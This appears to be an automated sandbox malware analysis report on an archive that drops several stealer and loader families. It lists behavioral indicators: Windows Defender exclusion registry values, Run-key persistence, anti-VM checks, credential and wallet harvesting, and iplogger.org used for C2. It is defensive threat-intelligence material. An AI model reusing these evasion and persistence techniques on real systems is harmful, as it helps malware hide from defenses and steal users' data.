Malware Analysis Report

2024-11-13 18:56

Sample ID 240223-kxe46aea3y
Target release_v4.rar
SHA256 f2085a595daeffe3d442f07fee0ef1a2d77cdb521fd4ff4475efd87c75da1932
Tags
glupteba risepro smokeloader stealc zgrat pub3 backdoor collection discovery dropper evasion loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f2085a595daeffe3d442f07fee0ef1a2d77cdb521fd4ff4475efd87c75da1932

Threat Level: Known bad

The file release_v4.rar was found to be: Known bad.

Malicious Activity Summary

glupteba risepro smokeloader stealc zgrat pub3 backdoor collection discovery dropper evasion loader persistence rat spyware stealer trojan

Detect ZGRat V1

ZGRat

Glupteba

Stealc

SmokeLoader

Windows security bypass

Glupteba payload

RisePro

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Checks BIOS information in registry

Reads user/profile data of local email clients

Windows security modification

Identifies Wine through registry keys

Loads dropped DLL

Reads user/profile data of web browsers

Reads data files stored by FTP clients

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Checks installed software on the system

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Drops Chrome extension

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Launches sc.exe

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Checks processor information in registry

Modifies system certificate store

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Uses Task Scheduler COM API

outlook_win_path

Modifies registry class

Modifies Internet Explorer settings

Checks SCSI registry key(s)

Creates scheduled task(s)

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-23 08:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:03

Platform

win10v2004-20240221-en

Max time kernel

110s

Max time network

169s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1980 wrote to memory of 3320 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1980 wrote to memory of 3320 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1980 wrote to memory of 3320 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 179.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240221-en

Max time kernel

118s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2984 wrote to memory of 2144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2984 wrote to memory of 2144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2984 wrote to memory of 2144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2984 wrote to memory of 2144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2984 wrote to memory of 2144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2984 wrote to memory of 2144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2984 wrote to memory of 2144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240215-en

Max time kernel

119s

Max time network

123s

Command Line

C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\Admin\AppData\Local\Temp\bentonite.png

Signatures

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\rundll32.exe N/A

Processes

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\Admin\AppData\Local\Temp\bentonite.png

Network

N/A

Files

memory/1764-0-0x0000000000220000-0x0000000000221000-memory.dmp

memory/1764-1-0x0000000000220000-0x0000000000221000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240220-en

Max time kernel

55s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\oO_q1f2AwSXGxmbqM3esoqyX.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Wine C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\oO_q1f2AwSXGxmbqM3esoqyX.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20240223090023.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\Tasks\beMXFFiCiqlBKkvOrW.job C:\Program Files\Internet Explorer\iexplore.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
